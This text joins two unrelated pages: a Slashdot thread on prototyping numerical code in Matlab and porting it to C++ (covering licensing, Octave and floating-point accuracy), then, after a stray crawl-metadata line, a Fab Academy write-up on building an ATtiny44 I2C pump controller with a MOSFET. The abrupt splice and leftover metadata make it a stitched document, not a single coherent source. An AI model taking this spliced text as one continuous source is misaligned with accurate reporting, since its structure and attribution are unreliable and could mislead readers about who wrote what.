Ruby is far from perfect, and it's not for everyone, but that can be said for any language. You could at least try to criticize it for its faults, not some guy who programs like a moron.
OMFG!!!1 C is a bastardization. Only crazy zealots program in C, cause they're always doing stuff like this [ioccc.org] or this. [ioccc.org] You'd have to be a zealot to use C!
See how stupid that looks?
Re:Ruby is worse (Score:2)
Re:Ruby is worse (Score:1)
Only zealots would respond to an obvious troll n/m (Score:1)
Re:Only zealots would respond to an obvious troll (Score:1)
Mathworks already went with Java (Score:3, Interesting)
Matlab is morphing into a Java scripting language. You know why the Matlab UI takes so long to load these days? Its written in Java, so it needs to load a Java VM when it launches with all of the attendant byte code checking of loaded classes.
Did you know that you can launch Java apps from the Matlab command prompt? That you can also create object instances of individual Java classes and invoke function calls on them? That Matlab automatically m
Do one thing at a time. (Score:2, Insightful)
Trying to write C++ code and develop the math at the same time means that you have four times the trouble debugging. If you have a problem you won't be sure whether it's in the math or the code. If you get the math right first, you
Re:Do one thing at a time. (Score:2)
Actually, if functional units are done in sequence, then the debugging in the second language will be trivial. After writing, testing, and debugging the Foo function in Matlab, the C++ work will be little more than transcription.
If you can interface Matlab to C++, you can even use the same tests for both codebases.
Re:Do one thing at a time. (Score:2)
Start High, Then Low (Score:4, Insightful)
Start in whatever language happens to be easiest/most high level. Easiest in that whatever helps you express your final product the fastest. Then, when this prototype is up and running, go ahead and reprogram it in C++ for speed.
Think of using the first language as a roadmap, where you can concentrate on organizing your thoughts and getting user requirements out of the way. Done purely in C++, you may be subject to premature optimization or just wasting time re-inventing constructs and concepts that are trivial in the other language.
Re:Start High, Then Low (Score:2)
Re:Start High, Then Low (Score:2)
Elegant code reduces development time.
Are you calling GNU code elegant ?
No-one I know that has to cope with GNU code would call it elegant.
Re:Start High, Then Low (Score:2)
Re:Start High, Then Low (Score:3, Informative)
Are you calling GNU code elegant ? No-one I know that has to cope with GNU code would call it elegant.
What GNU code do you mean? There are many official GNU projects, some very elegant, some rather crufty, most a mixture of both. Your comment makes no sense.
Proprietry lock-in (Score:1)
Well, starting out developing using a proprietry environment such as Matlab is not the smartest move if it's so easy to implement your code in C++. What happens if TheMathWorks double their licensing fee? Triple it? Go bust?
Using a properly-defined (ie. by an ISO/IEC standard) language is a much smarter thing to do. Choosing one with several available compilers, supported on different OS / CPU platorms helps too.
Try to make your project as independant as possible, and it will stand a much better chanc
Re:Proprietry lock-in (Score:1)
Re:Proprietry lock-in (Score:4, Interesting)
If you can save time by using Matlab, even in your very unlikely scenario, the extra cost of the software is still dwarfed by the cost of programmers time as well as the potential losses of being 2nd to market. Unless the software is prohibitively expensive(which Matlab isn't), you need to go with what can get the job done the fastest with the fewest errors.
Re:Proprietry lock-in (Score:5, Interesting)
So that is $5,000 a Year of software cost. Now the programmer will work a 35 hour work week. Now the Cheap Programmer year cost is $26,250 a year and the expensive programmer $262,500 a year. So programmers are more expensive then licenses. So if this tool can make a programmer twice as productive then it is worth the license. So unless the programmer is getting like $3.00 an hour which is less then most outsourcing. The costs to do it in C++ vs. Paying for a license is worth it.
Re:Proprietry lock-in (Score:2)
That's only true if they're developing for their own in-house work. But if they're trying to sell this product to other people, going the Matlab route just took $10,000 off their margin. If they want to make a profit, they need to sell their product for $10,000 + [developer time per unit] + [desired profit].
If they go the c++ route, they only have to sell it for [developer time per unit] + [desired profit]. The developer time might be more, but with the lower price, they have a better chance of selling m
Re:Proprietry lock-in (Score:1)
It's not circular. One cost is sunk and the other is variable. If they sell more copies they can more easily amortize the sunk cost and actually, you know, make real long term profit.
Re:Proprietry lock-in (Score:2)
In my (possibly incorrect) view, the choice seemed to be to develop using matlab and spend less time developing, or to develop in C++ and spend more time developing. I was saying that it may be cheaper on a per-unit basis to pay the develo
Re:Proprietry lock-in (Score:3, Insightful)
Re:Proprietry lock-in (Score:2)
Here's the price sheet:
RIGHT NOW, the single-copy United States price for Matlab for commercial use is $1900. The various add-on toolboxes cost anywhere from a few hundred dollars to several thousand dollars.
Those are ONE-TIME purchase prices, not annual license fees. Annual maintenance contracts, which get you upgrades as they become available, are typically around 1/5 of the purchase
Re:Proprietry lock-in (Score:1)
Your proprietry English that contains "independant" will probably go out of business and you will wither and perish.
Re:Proprietry lock-in (Score:1)
Re:Proprietry lock-in (Score:1)
GNU Octave (Score:2)
Depending on how you're using it, you could replace Matlab with GNU Octave [octave.org].
Avoiding proprietary dependencies (especially expensive ones like Matlab) is generally a good idea.
The myth of lock-in (Score:2)
Here at
Moving from one product to another is alwais costly, the cost of the licences is normally not relevant. Actually in most cases (exceptions exist, so annedotal evidence of e opposite can be presented) these costs are actually not significant.
Don't worry about the lock in, do worry about what a product can do for you.
Re:The easy way (Score:2, Informative)
Re:The easy way (Score:4, Insightful)
octave 2.9 is pretty awsome. We use it (for solving a lot of Lp problems, with some branch-and-bound), and it works beautiful.
As for the question... I would question the wisdom in abandoning octave (or matlab) at all, but if you do need to do it, do it in small steps. At least, that is the best way in my experience.
Re:The easy way (Score:2)
This should have read, "So it won't be either faster or (much) easier." This could be rewritten in ways providing a choice between "either/or" or "neither/nor" but "nor/nor" doesn't make sense. There is also the misuse of "a lot" to mean either many or much.
My own imperfect skills in grammar were not drilled into me by nuns with their rulers
Can you do modules in Matlab? (Score:1)
See whether Matlab provides something like that. If it does not., you'll be wasting a lot of time converting it all to C++ and then continuing research on a C++ base., which means half your R&D team would have to be re-educated.- November/016220.html [python.org]
The above link should be o
Re:Can you do modules in Matlab? (Score:1)
Yes you can do this, I believe you can even call MATLAB routines from within this code. The question is, is worth it. Unless you really have multiple ways of using the same code in different ways (say an ode solver) then you just end up with one big function written in C++ and the trival code to call this function in MATLAB.
Software wants to be free (Score:3, Funny)
Choose one language for development. (Score:5, Interesting)
Political: Undoubtedly you will get some changes and fixes that are really easy in one language and a real pain for an other one. So say it takes 5 Minutes in MatLab and could take a week in C++or Vice Versa. Most people don't get this fact especially non professional programmers. So one side group will get a fast change and the other will get the slow change. Thus makes the other group feel like their side isn't as well supported thus making you look really bad.
Business: Maintaining the application will always require people with skill sets in both. Matlab is a rather uncommon skill set while as of right now C++is fairly common. But finding people willing to do both is much harder. As time goes on and as one language leaves common use finding people with these skill sets combined will be very hard and expensive to keep.
Technical: Reported bugs will be need to check on both systems and bug will appear in one system and not the other. But when a bug is reported you will need to check on both systems. And sometime you can easily fix on system and the other requires a major rework. Getting performance on one system to be equivalent to the other will be difficult.
I think you are about to enter a quagmire which you will not come out looking good in. If you do succeed you will probably get a neutral reaction to you work. So it is a Loose/Tie situation. I would spend more time descussing other options. Going one way or the other. Not 2 products that do the same thing but differently.
Re:Choose one language for development. (Score:2, Informative)
Re:Choose one language for development. (Score:2)
It seems that unless Matlab has some sort of relatively cheap VM for their code (don't think they do) then this company should just switch to C++ right way if they want to release a product and make money off of it. But I don't think that's the right answer. You mentioned how there will be different bugs and how one group will get a fast change and the other will get a slow c
This situation has its own advantages (Score:2)
Utilizing two languages in the development process guarantees that however complete the Matlab version is, you still require a port over to C++. This becomes a natural opportunity to refactor and re-analyze the original work as you proceed to your final draft.
What's astonishing to me is that your management seems to tolerate you writing the application twice. If that's really so, please tell me where to contact you
Why do this at all? (Score:5, Insightful)
the Matlab code have a facility with Matlab and are subject matter experts that are doing the heavy lifting (algorithmically speaking). Are the C++ coders the same people? If they're not, can you afford to spend the time/staff to do the porting? Should the
original code even be in Matlab in the first place?
You can call matlab libraries from C++ code, which would seem to be the best of both worlds. Then you wouldn't have to port anything.
Lastly, this is not the kind of question that will get answered well on Slashdot. People who have never used matlab will make assumptions and not understand that it is very unlikely that C++ will have the kind of simulation and and capabilities that Matlab does. Besides, a lot of the time Matlab people (scientists, engineers, quants, etc) may be comfortable working Matlab but not C++, so you do what you can to make it possible for them to work. Also, the suggestion that Mathworks will raise pricing and hold your work hostage is laughable: They already do that, their pricing is crazy.
Re:Why do this at all? (Score:1, Insightful)
You have to realize that the speed at which the developement team works will break in significantly once they start to migrate to c++ (and it will stay below the former speed !!). Matlab is a very powerful tool when it comes to numerical tasks or data evaluation. It is also very forgiving regarding "quick a
Re:Why do this at all? (Score:1)
Unless you want to distribute your application to people who don't have MATLAB. Or is the MATLAB runtime engine [mathworks.com] free to distribute?
Re:Why do this at all? (Score:2)
Absolutely correct. Coincidentally, yesterday at the bookstore I saw a book on network programming in Matlab, which was a big surprise (to my non-Matlab-using mind).
Re:Why do this at all? (Score:2)
This has to be done because not everyone is a scientist with an experimental, discovery mindset. Everyone is also not a C++ programmer (or Java, Perl, C, C#, etc.) and thus proficient at error checking and dealing with a variety of system interaction. Face it, people hire scientists to develop things no one else is doing, but who learned programming as a necessary evil. People hire professional developers to glue or reform that prototype effort into something a customer wants. I found that my college tr
Compile the Matlab (Score:4, Informative)
Re:Compile the Matlab (Score:2)
Many of the built in functions in Matlab are coded in eg C. And as you mention Matlab even has built in functionality for porting code to C from the Matlab scripting language.
I'd advice the OP to go that route. Profile your code and begin by moving over the parts that are eating the majority of your cycles. Design it similar to the
Once
Do it in C++ from the start (Score:3, Interesting)
However, having said that, I must say that I *do* write small prototypes first, only I do it in C rather than other languages. I also use plenty of small scripts, mostly in Perl, to perform auxiliary operations. But the main code that constitutes the algorithms used in the program should be prototyped as close to the end code as possible. There is no way you could develop an algorithm in Matlab or Python or Ruby and consider its testing a validation for a deliverable program written in C++.
Re:Do it in C++ from the start (Score:1)
No offensive, but if the maths your doing is easier than writing a ui then you are either doing very simple maths or very complicated user interfaces!
Seriously, if you're implementing an algorithm to solve a 2nd order differential equation using the finite element method or using the shooting
Re:Do it in C++ from the start (Score:5, Insightful)
Hard? Only if you cannot or don't want to use existing libraries for C++ [diffpack.com]. Now try to find a pre-packaged solution for "they want a button for downloading the data in the same dialog that lets them open an Excel spreadsheet" or any of the infinite other changes one always gets to do in any non-trivial GUI.
Re:Do it in C++ from the start (Score:2)
No offensive, but if the maths your doing is easier than writing a ui then you are either doing very simple maths or very complicated user interfaces!
There are lots of people here who do math/science for a living who disagree with this. Nobody codes algorithms they don't understand, and coding algorithms you undertsand well is trivial in most general purpose languages that include math libraries. Really.
It depends on what you're developing (Score:2)
Develop the algorithms in matlab. Develop the UI in C++. Use matlab to create loadable modules that can be called from your C++ program.
Matlab is not ideal for developing the UI. C++ is not ideal for developing math algorithms.
Beyond that, do what makes sense for your program and developers.
-Adam
Bass ackwards (Score:2)
I would do the UI in Matlab or at least keep the UI in Matlab because that is what the dude probably has. The thing to migrate the UI part in is Java Swing -- you can incorporate custom Java Swing widgets into a Matlab GUI.
Re:Bass ackwards...actually, retrograde (Score:1)
Use ITPP C++ library which maps perfetly to matlab (Score:2, Informative)
Been there, Done That... (Score:4, Insightful)
I would continue to develop algorithms in Matlab, and use the Matlab compiler to move the algorithms to C++ for integration with the C++ "presentation layer" code. Then compile and ship an all-C++ product.
Drop Matlab (Score:1)
We need more information (Score:2)
I don't see how to give a meaningful answer to the general questions asked here without some more context.
For what it's worth, I write high-performance, somewhat high-level maths libraries in C++ for a living. You can do a lot of things more easily in C++ than some people would expect, particularly if you have access to the right libraries (someone already mentioned diffpack, and there are also ports of BLAS and LAPACK for linear algebra, and many others). Of course a dedicated tool will usually be better
Re:We need more information (Score:2)
sqrt(x * x + y * y)
Not sure how many ways there are to do that unless you roll your own sqrt() function.
Care to expand on it?
Re:We need more information (Score:2)
That's exactly not the way to do it: consider what happens if one of x and y is much greater than the other, as for example if you have a vector very slightly misaligned with the x- or y-axis.
To avoid this problem, you can rearrange as x*sqrt(1+(y/x)*(y/x)), or the same but pulling y out, depending on which is bigger. (In practice you'd calculate y/x only once, of course.)
Re:We need more information (Score:2)
obviously calculating the subtractions first. And for 3D you just add in "+ (z2 - z1) * (z2 - z1)".
Not sure why you need to re-arrange the equation especially since the normal version
contains 2 subtractions and 2 multiplications whereas yours contains 1 division, 2 mults
and 1 addition. Can't see how that would be faster.
Re:We need more information (Score:2)
Speed isn't the point; accuracy is. I'm afraid I don't have time right now to explain the details, but please refer to a good textbook such as Numerical Recipes and you'll find all the background there.
Re:We need more information (Score:2)
Re:We need more information (Score:2)
Pythagoras is accurate. A naive numerical implementation is not.
You know, this whole discussion is exactly what I was talking about when in my original post I wrote:
Re:We need more information (Score:2)
Re:We need more information (Score:2)
The point isn't whether division is more accurate than multiplication under normal circumstances, it's the vulnerability to destructive overflow/underflow. If that happens, doing things the naive way will be very much less accurate than a proper implementation based on the alternative approach I gave.
Really, this is elementary stuff. The fact that you keep missing the point doesn't mean there isn't a point, it just means you're not sufficiently familiar with the field to understand the danger. Please go a
Re:We need more information (Score:2)
FYI I do 3D graphics programming so I do have a clue about this but I guess we'll just have to agree to disagree.
Re:We need more information (Score:2)
I could have guessed that: your focus throughout this discussion has been on speed rather than accuracy. That's fair enough in your line of work, but not really relevant to this debate, where "serious" maths appears to be the order of the day.
We'll obviously have to agree to disagree on this one, so I leave you with one final thought: if you're not missing anything and I'm the one who doesn't understand, then why does Numerical Recipies in
Don't drop MATLAB (Score:4, Interesting)
Re:Don't drop MATLAB (Score:2)
I have to agree with this statement. Of course, it all depends on the kind of math you are doing. In general, MATLAB is better for prototyping new math-intensive algorithms (e.g. matrix math) and it might make sense to have
Do the Prototype then Drop Matlab (Score:1)
I would agree with the statement that the prototype algorithms could be completed in Matlab. If you do that, then complete the algorithm development in Matlab. You really don't want to switch languages mid-way through algorithm development.
The practical problem that I have seen more than once, in a research situation, is that the researchers try to complete the application in Matlab. The result is usually a disaster for a full-fledged high-performance application. Matlab does math well, but other th
Compiler (Score:2)
Similar Situation (Score:5, Insightful)
Re:Similar Situation (Score:3, Insightful)
Then Matlab must have improved a lot since I last used it (Version 4). A problem I had was that matrices were well behaved with small test cases, but became ill conditioned when we used actual worki
Re:C++ (Score:3, Insightful)
Good question. I'll answer that if you answer this: every time I get to a street intersection, should I turn right, turn left, or go straight ahead? The answer to both is: it depends. Where do you want to go? If the argument is a basic type that will not be changed, use a value, if it needs to be changed, use a reference, if it's a large structure or array, use a pointer.
A language that ignores
Re:C++ (Score:2)
It's funny, because I think pointers are essential to programming. That's because in my software projects I usually start with a sketch of the data structures. I draw in a piece of paper all the structures (or "tables" as the database people like to call them). Then I draw the relationships among those structures, by drawing lines with arrowheads from one structure to another. That way it's immediately ob
Matlab's prices (Score:2)
Depends on Program Complexity (Score:1)
Free Matlab work-alikes? (Score:2)
There are alternatives to Matlab that are similar, and can be resold in commercial
apps without any license or royalty issues.
I would personally use Python / NumPy & SciPy / Matplotlib in a heartbeat. There are even
tutorials for people who are used to Matlab on the subtle syntax differences.
You can even use SWIG (or Boost_python) to integrate your high level code with your
low level code in the same application. You can then distribute the result on
Windows, Mac or Linux with different bundling or freezi
Prototype in one language first (Score:1)
It also allows you to ensure that the prototype is rewritten when being implemented. It is not often that prototype design choices are the best for production, so needing to port guarantees that all code is revised, and you have a working implementation to give test results that the product sho
keep 2 languages (Score:1)
a math-centric or faff-minimising prototyping environment is crucial whilst constructing the math models which you'll later be putting into Production. you want to absolutely minimise the Drag of the tool on the thought process. you can use MatLab or Excel or a piece of paper.
then take the result as being the Specification (Logical) which will feed into your development. your Production-ready code's particular Phys
Prototype in the most straightforward language (Score:1)
This sounds like a reasonable prototyping/porting approach, really. I do much the same thing. For several years, I've been working on a programming language/calculating tool called Frink [futureboy.us], and when I'm trying to write new code that may eventually be part of Frink, say, efficiently calculating the Riemann Zeta function, or factoring large numbers, I'll usually first write the prototype function in the Frink language itself, and get it working. It's much less effort, and usually far more legible, to write | https://slashdot.org/story/06/07/20/2342227/managing-parallel-development-in-two-languages | CC-MAIN-2016-44 | refinedweb | 4,582 | 62.07 |
Introduction
People who are new to Python programming find it hard to understand two types of function arguments it provides namely *agrs and **kwargs. Let me be clear about one thing, you need not necessarily name those arguments as by the same name as above (args and kwargs) you can name that argument as your choice(eg- *agr, *agrs) what is important is that asterisk(*) symbol.
Note: for demonstration, I will be using Jupyter Notebook
*args in Python with examples
Example 1
def fun(*args): print(args) fun(1,2,3,4,5,'5.5', "rs")
Output:
(1, 2, 3, 4, 5, '5.5', 'rs')
Using *args we can give as many inputs as we want, but keeping in mind that arguments must be non-keyworded arguments function that uses *agrs(*any_name_by_user) returns all the values in a tuple.
Example 2
def fun(*args): print(args) fun(1,2,3,4,5,'5.5', name = "rajesh")
When you run this code you got an error like this:
Output:
--------------------------------------------------------------------------- TypeError Traceback (most recent call last) <ipython-input-14-3e9b260b8436> in <module> 1 def fun(*args): 2 print(args) ----> 3 fun(1,2,3,4,5,'5.5', name = "rajesh") TypeError: fun() got an unexpected keyword argument 'name'
Here you pass key and value which is not supported by *args argument
Use case of *args
Let’s say we have a function that adds up the numbers passed as arguments but the number of arguments totally depends on the user.
How can we do that?
⇒ The answer is simply using *args in a function.
def add(*args): result = sum(args) print(result) add(1,2,3,4,5) add(1,2,3,4,5,6,7,8,9,10.5)
Output:
15 55.5
In the above function, at first, we pass five arguments, and the second time we pass ten arguments.
Here in this case function handles no matter how many numbers are passed as arguments and return sum as the result.
**kwargs in Python with examples
Using *agrs we are unable to give keyworded arguments what if we wanted to give keyworded arguments there where **kwargs comes into the picture.
def fun(**kwargs): print(kwargs) fun(name="shiv", age=22, faculty="computer")
{'name': 'shiv', 'age': 22, 'faculty': 'computer'}
Note: Function with **kwargs returns values as a dictionary.
To access the values inside the function
# to access the values def fun(**kwargs): for key, values in kwargs.items(): print(f"key: {key} , value: {values}") fun(name="shiv", age=22, faculty="computer")
Output:
key: name , value: shiv key: age , value: 22 key: faculty , value: computer
Use case of **kwargs
Let’s say we want to store the information of a student(name, id, age, address, phone number) using only one function. So, is it possible to do that? The answer is yes using **kwargs.
def student_info(**kwargs): print(kwargs) student_info(name="Shiv Shrestha",id = 10, age = 22, address="Nepal", ph_no = 9800000000 )
Output:
{'name': 'Shiv Shrestha', 'id': 10, 'age': 22, 'address': 'Nepal', 'ph_no': 9800000000 }
Mostly the use of *args and **kwargs is in the Python decorator.
Conclusion
In Python, concepts of *args and **kwargs are important for programmers. *args is used in a function that accepts non-keyworded arguments and **kwargs is used in a function whose task is to accept the keyworded arguments.
The first one returns the accepted values in the form of tuple and the latter one returns the accepted values in the form of a dictionary.
For more information follow this link
Happy Learning:-) | https://pythonsansar.com/args-and-kwargs-python/ | CC-MAIN-2022-27 | refinedweb | 585 | 59.33 |
Implement User-defined Functions in SQL Server 2005 with Managed Code
Implementation of User-Defined Function
For the purposes of this example, create a new table whose declaration looks like the following:
CREATE TABLE Users(ID int, Name Varchar(50))
In the user-defined function, you return the name of the user based on the user's supplied ID. To create this function, select Project->Add User-Defined Function from the menu and specify the name of the user-defined function file as GetUserNameByID.cs. Once the file is created, modify the code in the class to look like the following:
using System; using System.Data; using System.Data.Sql; using System.Data.SqlServer; using System.Data.SqlTypes; public partial class UserDefinedFunctions { [SqlFunction] public static SqlString GetUserNameByID(int id) { SqlCommand cmd = SqlContext.GetCommand(); cmd.CommandText = "SELECT Name FROM Users WHERE ID = " + id.ToString() ; SqlDataRecord rec = cmd.ExecuteRow(); string name = rec.GetString(0); return name; } };
The following two lines of code should look familiar to developers who have written client applications that use the types found in the System.Data.SqlClient namespace:
cmd.CommandText = "SELECT Name FROM Users WHERE ID = " + id.ToString() ; SqlDataRecord rec = cmd.ExecuteRow();
The appropriate command text is specified by setting the CommandText property of the SqlCommand object returned by the call to SqlContext.GetCommand. Next, the ExecuteRow method of the SqlCommand object is called. This returns a value of type SqlDataRecord. SqlDataRecord is a new object that is introduced in ADO.NET 2.0. You can use this object to represent a specific record in the database. Once you have the record, you then can access the first string value column in the SqlDataRecord object by using the GetString method.
Now that you've created the user-defined function, you can build and deploy it using Visual Studio 2005. Once the deployment is completed, you can then test it, which the next section covers.
Testing the User-Defined Function Using a Windows Forms Application
In this example, you will test the function from a Windows forms client application that is created using Visual C#. (See the following screenshot.) Name the project UDFExamplesClientApp.
Next, add a label control, a textbox control, and a command button to the form. In the Click event of the command button, add the following lines of code:
private void btnInvoke_Click(object sender, EventArgs e) { using (SqlConnection connection = new SqlConnection()) { using (SqlCommand command = new SqlCommand()) { connection.ConnectionString = @"Server=(local)\SQLExpress;Integrated Security= True;Database=Test;Pooling=False"; //Set the SqlCommand object's properties command.CommandType = CommandType.Text; string userID = txtUserID.Text; command.CommandText = "SELECT dbo.GetUserNameByID(" + userID + ")"; command.Connection = connection; connection.Open(); DataSet userNameDataSet = new DataSet(); SqlDataAdapter adapter = new SqlDataAdapter(command); adapter.Fill(userNameDataSet); string userName = (string)userNameDataSet.Tables[0].Rows[0][0]; lblResult.Text = userName; } } }
With the above code, you do the following:
- Create an instance of SqlConnection in a using block and then create the SqlCommand object.
- Set the ConnectionString property of the SqlConnection object to a valid connection string. (Because you are using the SQL Server Express that is supplied with Visual Studio 2005, you specify integrated authentication in the connection string.)
- Set the CommandType property of the SqlCommand object to CommandType.Text to indicate that you want to execute a SQL statement.
- Set the CommandText property to the name of the user-defined function. (To the user-defined function, you also supplied the value entered by the user in the textbox as an argument.)
- Create instances of the DataSet, and SqlDataAdapter objects. (To the constructor of the SqlDataAdapter object, you also supplied the previously created SqlCommand object as an argument.)
- Execute the user-defined function by invoking the Fill method of the SqlDataAdapter object.
Once the user-defined function is executed and the dataset populated with the results of the query execution, you then can retrieve the result by navigating through the DataTable that is contained in the DataSet object.
If you execute the above code and click the command button, you will see the following screen. The label control displays the user name returned by the user-defined function.
Choosing Between T-SQL and Managed Code
When writing stored procedures, triggers, and user-defined functions, programmers now will have to decide whether to use traditional T-SQL or a .NET language such as Visual Basic .NET or C#. The correct decision depends upon the particular situation. In some cases, you should use T-SQL; in others, you should use managed code.
T-SQL is best in situations where the code will mostly perform data access with little or no procedural logic. Managed code is best suited for CPU-intensive functions and procedures that feature complex logic, or where you want to leverage the .NET Framework's Base Class Library. Code placement is another important fact to consider. You can run both T-SQL and in-process managed code on the server. This functionality places code and data close together, and allows you to take advantage of the processing power of the server.
On the other hand, you may wish to avoid placing processor-intensive tasks on your database server. Most client machines today are very powerful, and you may wish to take advantage of this processing power by placing as much code as possible on the client. While T-SQL code cannot run on a client machine, the SQL Server in-process provider was designed to be as similar as possible to client-side managed ADO.NET, enhancing the portability of code between server and client.
From T-SQL to Managed Code
With the release of SQL Server 2005 Beta 2, database programmers can now take advantage of the rich functionality of the .NET Base Class Library and the CLR. By uing CLR integration, you can create your user-defined functions using the .NET language of your choice. This will allow you to utilize the .NET Framework, which provides thousands of classes and methods on the server-side. Many tasks that were awkward or difficult to perform in T-SQL now can be easily accomplished using managed 4 of 4
| http://www.developer.com/net/csharp/article.php/10918_3399881_4/Implement-User-defined-Functions-in-SQL-Server-2005-with-Managed-Code.htm | CC-MAIN-2016-18 | refinedweb | 1,011 | 57.87 |
It's common knowledge in most programming languages that the flow for working with files is open-use-close. Yet I saw many times in ruby codes unmatched File.open calls, and moreover I found this gem of knowledge in the ruby docs:
I/O streams are automatically closed when they are claimed by the garbage collector.
I saw many times in ruby codes unmatched
File.opencalls
Can you give an example? I only ever see that in code written by newbies who lack the "common knowledge in most programming languages that the flow for working with files is open-use-close".
Experienced Rubyists either explicitly close their files, or, more idiomatically, use the block form of
File.open, which automatically closes the file for you. Its implementation basically looks something like like this:
def File.open(*args, &block) return open_with_block(*args, &block) if block_given? open_without_block(*args) end def File.open_without_block(*args) # do whatever ... end def File.open_with_block(*args) yield f = open_without_block(*args) rescue ensure f.close raise end
Scripts are a special case. Scripts generally run so short, and use so few file descriptors that it simply doesn't make sense to close them, since the operating system will close them anyway when the script exits.
Do we need to explicitly close?
Yes.
If yes then why does the GC autoclose?
Because after it has collected the object, there is no way for you to close the file anymore, and thus you would leak file descriptors.
Note that it's not the garbage collector that closes the files. The garbage collector simply executes any finalizers for an object before it collects it. It just so happens that the
File class defines a finalizer which closes the file.
If not then why the option?
Because wasted memory is cheap, but wasted file descriptors aren't. Therefore, it doesn't make sense to tie the lifetime of a file descriptor to the lifetime of some chunk of memory.
You simply cannot predict when the garbage collector will run. You cannot even predict if it will run at all: if you never run out of memory, the garbage collector will never run, therefore the finalizer will never run, therefore the file will never be closed. | https://codedump.io/share/vQLUqX3BqwKk/1/ruby39s-fileopen-and-the-need-for-fclose | CC-MAIN-2017-39 | refinedweb | 373 | 66.74 |
Week 11 - Output Devices
An I2C based Pump controller using a Attiny44!
Contents
- Contents
- Principle
- Design
- Testing the board:
Principle
In this week’s assignment I will work on a pump driver controlled by an I2C-based Attiny. This module will be part of my Final Project and will be used to recirculate the test gases in order to provide with a flow over the installation.
The pump I will be using is an AIRPO D2028B: a vacuum pump driven by a 12V / 12W DC motor:
Image Source: Abra Electronics
The pump is driven at 12V and it will be using a power supply available at the lab with a DC Barrel Power Jack. However, in order to switch on and off the pump, I will be complicating things a little bit and use a MOSFET driven by an Attiny44. Also, as happened in the previous week this will all be controlled by a Raspberry Pi, and the voltage levels have to be taken into account, so that the I2C communication is able to run at 3.3V and the Attiny can interface with the MOSFET running the pump.
MOSFETs
MOSFET stands for Metal-Oxide-Semiconductor Field Effect Transistors and they are a type of transitor commonly used in power electronics. Before jumping into the hardware implementation, I will detail here what I have learned about them.
How a MOSFET works is quite interesting thanks to the physics of semiconductors. Semiconductors are an intermediate case between conductive materials (mainly metals) and insulators. Semiconductors’ functions are described very nicely in this link and, even if I won’t repeat everything from there here, I think it is important to understand that the real magic for semiconductors in electronics occurs when they are doped: either with electrons or lack of them, they become a different type of material and their conductivity changes drastically. They are called N-type when they are doped negatively (with electrons) and P-type when they are doped positively (with electrons removal or addition of holes).
Moving electrons between N and P-types areas can be easy or tricky, depending on the direction they go to: from N-type to P-type areas is easy, and is very difficult the other way around. This property is key for transitors in general and is the base for their functioning.
More into detail, in the case of a MOSFET, we find a combination of three layers: N-P-N (with P-type layer sandwiched between the two N-types) and P-N-P (with N-type sandwiched between two P-types). The NPN is normally called N-channel and PNP is P channel. In the case of the N-channel, there is a layer of insulating material attached to the P-type semiconductor part, and attached to it we find the so called GATE. On the other sides (N terminals), we have the so called DRAIN and SOURCE, being this last one also connected to the non-insulated side of the GATE.
Image Source: Concise electronics for geeks
When we apply voltage to the GATE in an NPN, we are attracting electrons on the GATE side of the P-type material, leaving a positive charge on the oposite side. This creates a channel between the two N-type layers (I assume that’s where N-channel comes from). The larger the voltage we apply to the GATE, ideally, the larger the ammount of electrons we can have in the channel and therefore, the lower the resistance, meaning the MOSFET is ON. This means that if 0V are applied in the GATE, electrons will not group in the P-type material and the resistance will be too high and effectively it will create an open circuit, meaning the MOSFET is OFF.
This last part defines two very important parameters: the necessary voltage to turn ON the MOSFET and it’s resistance during that operation. The voltage is normally specified as Drive Voltage (or Vgs) and the resistance is normally specified as RDS(on). The latter is indeed very important, becase the power disipated by the MOSFET will be P = I^2 R, and the larger the resistance is, the larger the heat to disipate. Interestingly, this depends on the Voltage applied in the gate, and the minimum threshold is specified by Vgs (th).
Just to compile some more information about MOSFETS, it is important to know that they can either work as a normally-on or a normally-off switch. These are called depletion type or enhacement type and they are marked as a continuous or a dotted line between DRAIN and SOURCE:
-.
Image Source: Electronics tutorials
Where to put the MOSFET
Un-luckily for me, the Lab didn’t have a reasonably small N-channel MOSFET at the time I did this assignment, so I had to think if I wanted to use a P-channel type or a bigger N-channel, which was probably a bit overkill. In order to answer those questions, I reviewed this document, this site, this other one and these videos (btw, these are very explanatory):
The option using the P-Channel is not that inmediate for an electronics newby like me: the P-channel MOSFET will have to run on the HIGH SIDE of the circuit and it will be easily triggered ON whenever a voltage below the Drive voltage (VDD = 12VDC in my case) is applied to the gate. However, in order to turn OFF the MOSFET, it would need at least the VDD voltage, which in my case is not available in the circuit by itself, since the Attiny runs at 5V tops. There is another option to do this and is to use an N-channel MOSFET driven by a lower GATE Voltage which outputs to the GATE of a P-channel MOSFET. In this situation, the N-Channel MOSFET can be driven by a lower GATE voltage (for example coming from the Arduino) and it will Pull down the GATE of the MOSFET below VDD. When the N-channel MOSFET is turned OFF, the GATE of the P-Channel MOSFET will be switched back to VDD and the MOSFET will turn OFF.
This last option is interesting, but it wouldn’t make much sense for me to do it if I have to use the same N-channel MOSFET to run a P-channel MOSFET, when the N-channel MOSFET is so big that I could do the job by only using it on the LOW SIDE of the circuit.
Having said that, now the question is: since the Raspberry Pi runs the I2C at 3.3V and the N-channel big MOSFET has a minimum RDS(on) at 5V, will the MOSFET get too warm when there is 1A running through it in normal operation? Put differently, are the 3.3V of the Pi enough to run the MOSFET at a safe condition?
To be honest, I didn’t realise about this problem until I had built the board. Nevertheless, in case this isn’t safe, the board can either be redesigned in order to run at 5V on the MOSFET side with a level shifter, or the Raspberry Pi Hat can be redesigned so that the 5V are downshifted in the SDA and SCL lines. Although this is a weird combination of Power vs I2C levels in the hat and needs to be rethought.
Design
For the design of this board I used KiCad. The schematics of the board, including an indicating LED, an ISP, the above mentioned MOSFET and a power connector is below:
The I2C connector is the same as the one done in the previous assignment, but this time with some more room for the legs to have some soldering to attach to. For the pump, I measured the terminals and created my own footprint for it:
The Pads in this case are made as through-hole, defined like:
In the case of the Motor, I added a flyback Diode and a current limiting resistor for when the Pump is turned off, following this schema:
Finally, I added a 10kΩ pull down resistor in the MOSFET GATE in order to easily turn the MOSFET OFF.
Routing
The final PCB routing looks like:
Note that I added a hole for the shaft in the PCB and two small holes under the barrell power jack for the locatin pins it has underneath.
Then, I moved onto fab.modules on the Modela MDX-20 in the lab, using the following PNG for the traces (in this same order):
For the Inner cuts:
For the Jack Holes:
And finally the outter cut:
The final board result, with all the components soldered in it looks like:
Testing the board:
I will be using a very simple blink LED sketch to test the board intially. Following the same procedure to write the fuses and set up the CLK divider as seen in the previous week.
